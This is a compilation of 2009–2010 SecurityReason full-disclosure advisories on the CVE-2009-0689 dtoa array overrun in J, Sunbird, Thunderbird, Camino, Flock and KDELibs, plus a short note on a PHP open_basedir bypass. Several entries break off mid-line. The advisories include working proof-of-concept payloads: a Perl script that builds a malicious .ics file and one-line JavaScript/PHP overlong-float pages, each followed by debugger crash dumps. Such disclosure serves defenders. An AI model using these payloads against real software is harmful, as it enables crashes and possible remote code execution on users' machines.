- Pub.: 08.01.2010
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
- J 6.02.023 Array Overrun (code execution)
NOTE: Prior versions may also be affected.
Original URL: http://securityreason.com/achievement_securityalert/79

--- 0. Description ---
The J programming language, developed in the early 1990s by Ken Iverson and Roger Hui, is a synthesis of APL (also by Iverson) and the FP and FL function-level languages created by John Backus. To avoid repeating the APL special character problem, J requires only the basic ASCII character set, resorting to the use of digraphs formed using the dot or colon characters to extend the meaning of the basic characters available. Additionally, to keep parsing and the language simple, and to compensate for the lack of character variation in ASCII, J treats many characters which might need to be balanced in other languages (such as [] {} "" `` or <>) as stand alone tokens or (with digraphs) treats them as part of a multi-character token. Being an array programming language, J is very terse and powerful, and is most suited to mathematical and statistical programming, especially when performing operations on matrices. J is a MIMD language.

--- 1. J 6.02.023 Array Overrun (code execution) ---
The main problem exists in the dtoa implementation. J has the same dtoa as MatLab, OpenBSD, MacOS, Google, Opera etc., and it is the same as SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63

But the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the fix for OpenBSD and similar systems is in SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. Kmax is defined as 15. Functions in dtoa don't check the Kmax limit, and it is possible to use elements >= 16 of the freelist array.

--- 2. Proof of Concept (PoC) ---
There are several ways to make a successful attack. The simplest assumes the creation of a script with a defective floating-point variable and executing it. This will allow the possibility of code execution.

-expl.ijs--
cxib=0.
-expl.ijs--

Program received signal SIGSEGV, Segmentation fault.
0x00452157 in ?? ()
eax    0x4c2000     4988928
ecx    0x2c667c     2909820
edx    0x46d054     4640852
ebx    0x48a607     296455
esp    0x98f720     0x98f720
ebp    0x98f77c     0x98f77c
esi    0x436380870662152
edi    0x0          0
eip    0x452157     0x452157
eflags 0x10206      [ PF IF RF ]
cs     0x1b         27
ss     0x23         35
ds     0x23         35
es     0x23         35
fs     0x3b         59
gs     0x0          0

edi=0

(gdb) x/i $eip
0x452157: test %eax,(%eax)
(gdb) x/x $eax
0x4c2000: 0x

--- 3. SecurityReason Note ---
Officially SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock
- MatLab
- J

This list is not yet closed.

--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/li
[Full-disclosure] SecurityReason: Sunbird 0.9 Array Overrun (code execution) 0day
[ Sunbird 0.9 Array Overrun (code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009
CVE: CVE-2009-0689
CWE: CWE-199
Risk: High
Remote: Yes
Affected Software:
- Sunbird 0.9
NOTE: Prior versions may also be affected.
Original URL: http://securityreason.com/achievement_securityalert/77

--- 0. Description ---
Mozilla Sunbird is a cross-platform calendar application, built upon Mozilla Toolkit. Our goal is to provide you with a full-featured and easy to use calendar application that you can use around the world.

--- 1. Sunbird 0.9 Remote Array Overrun (Arbitrary code execution) ---
The main problem exists in the dtoa implementation. Sunbird has the same dtoa as Firefox, etc. The problem exists in the js3250.dll (version 4.0.0 - Netscape 32-bit JavaScript Module) DLL library, and it is the same as SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63

But the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the fix for OpenBSD and similar systems is in SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. Kmax is defined as 15. Functions in dtoa don't check the Kmax limit, and it is possible to use elements >= 16 of the freelist array.

--- 2. Proof of Concept (PoC) ---
If we use Sunbird to open or import a crafted "ics" file, Sunbird will crash. For example:

---
#!/usr/bin/perl
# SecurityReason.com
# sp3x
# tested on WinXp SP3

my $header = "BEGIN:VCALENDAR\n".
  "PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n".
  "VERSION:2.0\n".
  "BEGIN:VTIMEZONE\n".
  "TZID:Europe/Prague\n".
  "X-LIC-LOCATION:Europe/Prague\n".
  "BEGIN:DAYLIGHT\n".
  "TZOFFSETFROM:+0100\n".
  "TZOFFSETTO:+0200\n".
  "TZNAME:CEST\n".
  "DTSTART:19700329T02\n".
  "RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n".
  "END:DAYLIGHT\n".
  "BEGIN:STANDARD\n".
  "TZOFFSETFROM:+0200\n".
  "TZOFFSETTO:+0100\n".
  "TZNAME:CET\n".
  "DTSTART:19701025T03\n".
  "RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n".
  "END:STANDARD\n".
  "END:VTIMEZONE\n".
  "BEGIN:VEVENT\n".
  "CREATED:20091117T095214Z\n".
  "LAST-MODIFIED:20091117T095217Z\n".
  "DTSTAMP:20091117T095214Z\n".
  "UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n";
# the SUMMARY value is the malformed float: "0." followed by 296450 '1' digits
my $s = "SUMMARY:0.";
my $expl = "1" x 296450;
my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T11\n".
  "DTEND;TZID=Europe/Prague:20100111T12\n".
  "END:VEVENT\n".
  "END:VCALENDAR\n";
open(myfile,'>>test.ics') or die "cannot open test.ics: $!";
print myfile $header.$s.$expl.$footer;
close(myfile);
---

0:000> r
eax=015e06f9 ebx=0001 ecx=658cebec edx=0002 esi=015e0710 edi=015e06f9
eip=600f154f esp=0012e330 ebp=0012e35c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206
js3250!JS_strtod+0xb0a:
600f154f 8b01 mov eax,dword ptr [ecx] ds:0023:658cebec=

0:000> ub 600f1551
js3250!JS_strtod+0xaf2:
600f1537 83c414 add esp,14h
600f153a 8b75fc mov esi,dword ptr [ebp-4]
600f153d e96bf5 jmp js3250!JS_strtod+0x68 (600f0aad)
600f1542 56 push esi
600f1543 57 push edi
600f1544 8b7c240c mov edi,dword ptr [esp+0Ch]
600f1548 8d0cbd08d01460 lea ecx,js3250!js_XMLClass+0x560 (6014d008)[edi*4]
600f154f 8b01 mov eax,dword ptr [ecx]

0:000> !exchain
0012fc9c: USER32!_except_handler3+0 (7e39048f)
  CRT scope 0, func: USER32!UserCallWinProc+10a (7e39ac2d)
0012fcf4: USER32!_except_handler3+0 (7e39048f)
  CRT scope 0, filter: USER32!DispatchMessageWorker+113 (7e39074a)
  func: USER32!DispatchMessageWorker+126 (7e390762)
0012fd5c: sunbird!jpeg_mem_term+eb7 (00849745)
0012ffb0: sunbird!jpeg_fdct_islow+266a4 (00848818)
0012ffe0: kernel32!_except_handler3+0 (7c839ac0)
  CRT scope 0, filter: kernel32!BaseProcessStart+29 (7c843882)
  func: kernel32!BaseProcessStart+3a (7c843898)
Invalid exception stack at

0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012e35c 600f15f3 js3250!JS_strtod+0xb0a
0012e37c 600f0ef9 js3250!JS_strtod+0xbae
0012e3f4 6010e8eb js3250!JS_strtod+0x4b4
0012e448 6010e3c6 js3250!JSLL_MinInt+0x1dcf
0012e46c 60103fb5 js3250!JSLL_MinInt+0x18aa
0012e5dc 6010195e js3250!js_Invoke+0x2c1b
0012e694 60101cb2 js3250!js_Invoke+0x5c4
0012e71c 60101e0a js3250!js_Invoke+0x918
0012e74c 6011350d js3250!js_Invoke+0xa70
0012e7a4 600e3c41 js3250!js_FindProperty+0x974
0012e7bc 004274cf js3250!JS_SetProperty+0x36
0012e978 0042593e sunbird!NS_RegistryGetFactory+
[Full-disclosure] SecurityReason: Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code execution)
[ Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
- Thunderbird 2.0.0.23
Fixed in:
- Thunderbird 3.0
- Thunderbird 2.0.0.24pre
NOTE: Prior versions may also be affected.
Original URL: http://securityreason.com/achievement_securityalert/78

--- 0. Description ---
Thunderbird 2 includes many new features to help you manage your inbox. With Thunderbird 2, it's easier to prioritize and find your important email with tags and the new find bar helps you find content within your email faster.

Lightning brings the Sunbird calendar to the popular email client, Mozilla Thunderbird. Since it's an extension, Lightning is tightly integrated with Thunderbird, allowing it to easily perform email-related calendaring tasks.

--- 1. Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code execution) ---
The main problem exists in the dtoa implementation. Thunderbird has the same dtoa as Firefox, etc. This problem affects many additional Add-ons for Thunderbird. Examples of affected Add-ons:
- Lightning 0.9
- Thunderbrowse 3.2.6.7
- more

and it is the same as SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63

But the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the fix for OpenBSD and similar systems is in SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. Kmax is defined as 15. Functions in dtoa don't check the Kmax limit, and it is possible to use elements >= 16 of the freelist array.

--- 2. Proof of Concept (PoC) ---

(PoC for Lightning)
---
#!/usr/bin/perl
# SecurityReason.com
# sp3x
# tested on WinXp SP3

my $header = "BEGIN:VCALENDAR\n".
  "PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n".
  "VERSION:2.0\n".
  "BEGIN:VTIMEZONE\n".
  "TZID:Europe/Prague\n".
  "X-LIC-LOCATION:Europe/Prague\n".
  "BEGIN:DAYLIGHT\n".
  "TZOFFSETFROM:+0100\n".
  "TZOFFSETTO:+0200\n".
  "TZNAME:CEST\n".
  "DTSTART:19700329T02\n".
  "RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n".
  "END:DAYLIGHT\n".
  "BEGIN:STANDARD\n".
  "TZOFFSETFROM:+0200\n".
  "TZOFFSETTO:+0100\n".
  "TZNAME:CET\n".
  "DTSTART:19701025T03\n".
  "RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n".
  "END:STANDARD\n".
  "END:VTIMEZONE\n".
  "BEGIN:VEVENT\n".
  "CREATED:20091117T095214Z\n".
  "LAST-MODIFIED:20091117T095217Z\n".
  "DTSTAMP:20091117T095214Z\n".
  "UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n";
# the SUMMARY value is the malformed float: "0." followed by 296450 '1' digits
my $s = "SUMMARY:0.";
my $expl = "1" x 296450;
my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T11\n".
  "DTEND;TZID=Europe/Prague:20100111T12\n".
  "END:VEVENT\n".
  "END:VCALENDAR\n";
open(myfile,'>>test.ics') or die "cannot open test.ics: $!";
print myfile $header.$s.$expl.$footer;
close(myfile);
---

(PoC for Thunderbrowse)
---
var a=0.<?php echo str_repeat("1",33); ?>;
---

When we use Thunderbrowse to see this site, Thunderbird will crash with:

Program terminated with signal 11, Segmentation fault.
#0 0xbb15d1e7 in ?? ()
eax    0x0          0
ecx    0xa          10
edx    0x0          0
ebx    0xbb16eb38   -1156125896
esp    0xbfbfce58   0xbfbfce58
ebp    0xbfbfce74   0xbfbfce74
esi    0xb          11
edi    0xb768e700   -1217861888
eip    0xbb15d1e7   0xbb15d1e7
eflags 0x282        [ SF IF ]
cs     0x23         35
ss     0x2b         43
ds     0x2b         43
es     0x2b         43
fs     0xab         171
gs     0xb3         179
(gdb) x/x ($eip)
0xbb15d1e7: Cannot access memory at address 0xbb15d1e7
(gdb) x/x ($esi)
0xb: Cannot access memory at address 0xb
(gdb) x/x ($edi)
0xb768e700: 0x1c71c71c

now esi=0xb and edi=0x1c71c71c

(gdb) x/20x ($edi)
0xb768e700: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb768e710: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0xb768e720: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0xb768e730: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb768e740: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
(gdb) x/50x ($edi)+37000
0xb7697788: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0xb7697798: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0xb76977a8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb76977b8: 0xc71c71c7 0x71
[Full-disclosure] SecurityReason: Camino 1.6.10 Remote Array Overrun (Arbitrary code execution)
[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Camino 1.6.10

Fixed in:
- Camino 2.0 and later

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/76

--- 0. Description ---

Camino (from the Spanish word camino meaning "way", "path" or "road") is a free, open source, GUI-based Web browser based on Mozilla's Gecko layout engine and specifically designed for the Mac OS X operating system. In place of the XUL-based user interface used by most Mozilla-based applications, Camino uses Mac-native Cocoa APIs, although it does not use native text boxes.

--- 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ---

The main problem exists in the dtoa implementation. Camino has the same dtoa as Firefox, SeaMonkey, Chrome, Opera etc., and it is the same issue as SREASONRES:20090625,
http://securityreason.com/achievement_securityalert/63
but the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the OpenBSD fix and similar ones is in SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69

We can supply a floating-point literal of any length, and parsing it overwrites memory. Kmax is defined as 15, so the freelist array has Kmax+1 = 16 entries (indices 0 to 15). The dtoa functions do not check the Kmax limit, so a long enough number makes them access freelist elements at index 16 and above.

--- 2. Proof of Concept (PoC) ---

---
var a=0.<?php echo str_repeat("1",296450); ?>;
---

Process:         Camino [153]
Path:            /Volumes/Camino/Camino.app/Contents/MacOS/Camino
Identifier:      org.mozilla.camino
Version:         1.6.10 (1609.09.25)
Code Type:       X86 (Native)
Parent Process:  launchd [92]

Date/Time:       2009-11-06 12:57:24.698 -0800
OS Version:      Mac OS X 10.5.6 (9G55)
Report Version:  6

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x7e33d590
Crashed Thread:  0

Thread 0 Crashed:
0   libSystem.B.dylib     0x01d7e325 tiny_malloc_from_free_list + 235
1   libSystem.B.dylib     0x01d7710d szone_malloc + 180
2   libSystem.B.dylib     0x01d77018 malloc_zone_malloc + 81
3   libSystem.B.dylib     0x01d76fac malloc + 55
4   libxpcom_core.dylib   0x00c5271d PL_DHashTableInit + 220
5   org.mozilla.camino    0x00389bac RuleHash::RuleHash(int) + 282
6   org.mozilla.camino    0x0038ae0e nsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146
7   org.mozilla.camino    0x0038b215 nsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27
8   org.mozilla.camino    0x003afbd0 EnumPseudoRulesMatching(nsIStyleRuleProcessor*, void*) + 24
9   org.mozilla.camino    0x003b0885 nsStyleSet::FileRules(int (*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*) + 37
10  org.mozilla.camino    0x003b0c77 nsStyleSet::ResolvePseudoStyleFor(nsIContent*, nsIAtom*, nsStyleContext*, nsICSSPseudoComparator*) + 123
11  org.mozilla.camino    0x002cc924 nsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134
12  org.mozilla.camino    0x002f617b PresShell::InitialReflow(int, int) + 1151
13  org.mozilla.camino    0x005a90d4 nsContentSink::StartLayout(int) + 342
14  org.mozilla.camino    0x00483354 HTMLContentSink::StartLayout() + 82
15  org.mozilla.camino    0x00486cb7 HTMLContentSink::OpenBody(nsIParserNode const&) + 193
16  org.mozilla.camino    0x001a60e8 CNavDTD::OpenBody(nsCParserNode const*) + 54
17  org.mozilla.camino    0x001a8b53 CNavDTD::HandleDefaultStartToken(CToken*, nsHTMLTag, nsCParserNode*) + 393
18  org.mozilla.camino    0x001aa3e5 CNavDTD::HandleStartToken(CToken*) + 623
19  org.mozilla.camino    0x0012 CNavDTD::HandleToken(CToken*, nsIParser*) + 1358
20  org.mozilla.camino    0x001a9a4d CNavDTD::BuildModel(nsIParser*, nsITokenizer*, nsITokenObserver*, nsIContentSink*) + 165
21  org.mozilla.camino    0x001a94ee CNavDTD::DidBuildModel(unsigned int, int, nsIParser*, nsIContentSink*) + 550
22  org.mozilla.camino    0x001b5e28 nsParser::DidBuildModel(unsigned int) + 90
23  org.mozilla.camino    0x001b83c7 nsParser::ResumeParse(int, int, int) + 661
24  org.mozilla.camino    0x001b59a8 nsParser::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 128
25  org.mozilla.camino    0x002076a0 nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 88
26  org.mozilla.camino    0x000f522a nsFileChannel::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 78
27
[Full-disclosure] SecurityReason: Flock 2.5.2 Remote Array Overrun (Arbitrary code execution)
[ Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Flock 2.5.2

Fixed in:
- Flock 2.5.5

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/75

--- 0. Description ---

Flock is a web browser built on Mozilla's Firefox codebase that specializes in providing social networking and Web 2.0 facilities built into its user interface. Flock v2.5 was officially released on May 19, 2009. The Flock browser is available as a free download, and supports Microsoft Windows, Mac OS X, and Linux platforms.

--- 1. Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ---

The main problem exists in the dtoa implementation. Flock has the same dtoa as Firefox, SeaMonkey, Chrome, Opera etc., and it is the same issue as SREASONRES:20090625,
http://securityreason.com/achievement_securityalert/63
but the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the OpenBSD fix and similar ones is in SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69

We can supply a floating-point literal of any length, and parsing it overwrites memory. Kmax is defined as 15, so the freelist array has Kmax+1 = 16 entries (indices 0 to 15). The dtoa functions do not check the Kmax limit, so a long enough number makes them access freelist elements at index 16 and above.

--- 2. Proof of Concept (PoC) ---

---
var a=0.<?php echo str_repeat("1",296450); ?>;
---

Program received signal SIGSEGV, Segmentation fault.
0x67c68740 in js3250!JS_DHashTableEnumerate () from C:\Program Files\Flock\js3250.dll
(gdb) i r
eax            0x964619c7 -1773790777
ecx            0x2        2
edx            0x2        2
ebx            0x2        2
esp            0x20e7f0   0x20e7f0
ebp            0x1        0x1
esi            0x299d700  43636480
edi            0x299d701  43636481
eip            0x67c68740 0x67c68740
eflags         0x210202   [ IF RF ID ]
cs             0x1b       27
ss             0x23       35
ds             0x23       35
es             0x23       35
fs             0x3b       59
gs             0x0        0
(gdb) x/i 0x67c68740
0x67c68740:  mov 0x67ce0458(,%edi,4),%eax
(gdb) x/x $eax
0x964619c7: Cannot access memory at address 0x964619c7

--- 3. SecurityReason Note ---

Officially, SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- Flock

This list is not yet closed.

--- 4. Fix ---

NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.or
[Full-disclosure] PHP 5.3.1 open_basedir bypass
hi,

In the php 5.3.1 security changelog we can read that the safe_mode bypass in tempnam() has already been fixed. But safe_mode in the 5.3 line is deprecated. We can understand a security fix for an open_basedir bypass, but not for safe_mode in 5.3.

Annoying is the fact that an exploit for bypassing open_basedir or safe_mode in php 5.3.1 is available in
http://securityreason.com/achievement_exploitalert/14

We can use the symlink trick like in
http://securityreason.com/achievement_securityalert/70

The issue has been reported to PHP, but did not obtain a meaningful response.

A very similar issue was reported in October 2006 by Stefan Esser (SREASON:1692)
http://securityreason.com/securityalert/1692
This issue has been fixed. The small difference with this one is that we need to create a fake directory structure.

--
Best Regards,
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib)
sub 4096g/0889FA9A 2008-08-22
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
[Full-disclosure] SecurityReason: KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 20.11.2009

CVE: CVE-2009-0689
Risk: High
Remote: Yes

Affected Software:
- KDELibs 4.3.3

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/74

--- 0. Description ---

KDELibs is a collection of libraries built on top of Qt that provides frameworks and functionality for developers of KDE-compatible software. The KDELibs libraries are licensed under the LGPL.

--- 1. KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ---

The main problem exists in the dtoa implementation. KDE has a dtoa algorithm very similar to the one in the BSDs, Chrome and the Mozilla products. The problem exists in the dtoa.cpp file
http://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup
and it is the same issue as SREASONRES:20090625,
http://securityreason.com/achievement_securityalert/63
but the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the OpenBSD fix and similar ones is in SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69

We can supply a floating-point literal of any length, and parsing it overwrites memory. Kmax is defined as 15, so the freelist array has Kmax+1 = 16 entries (indices 0 to 15). The dtoa functions do not check the Kmax limit, so a long enough number makes them access freelist elements at index 16 and above.

--- 2. Proof of Concept (PoC) ---

---
var a=0.<?php echo str_repeat("9",29); ?>;
---

If we use konqueror to view this PoC, konqueror crashes. For example:

---
var a=0.<?php echo str_repeat("1",296450); ?>;
---

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 24845, thread 0x7e6e6800]
0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0
0x06db85c3 :  mov %esi,(%ecx)
#0  0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0
#1  0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0
#2  0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0
#3  0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0
#4  0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0
#5  0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0
#6  0x0908337f in KJS::InterpreterImp::evaluate ()
(gdb) i r
eax            0x0        0
ecx            0x220ff000 571469824
edx            0x0        0
ebx            0x220fbb00 571456256
esp            0xcfbc04e0 0xcfbc04e0
ebp            0xcfbc0518 0xcfbc0518
esi            0xc71c71c7 -954437177
edi            0x0        0
eip            0x21415c3  0x21415c3

esi = 0xc71c71c7

--- 3. SecurityReason Note ---

Officially, SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- KDE (example: konqueror)
- Opera
- K-Meleon

This list is not yet closed.

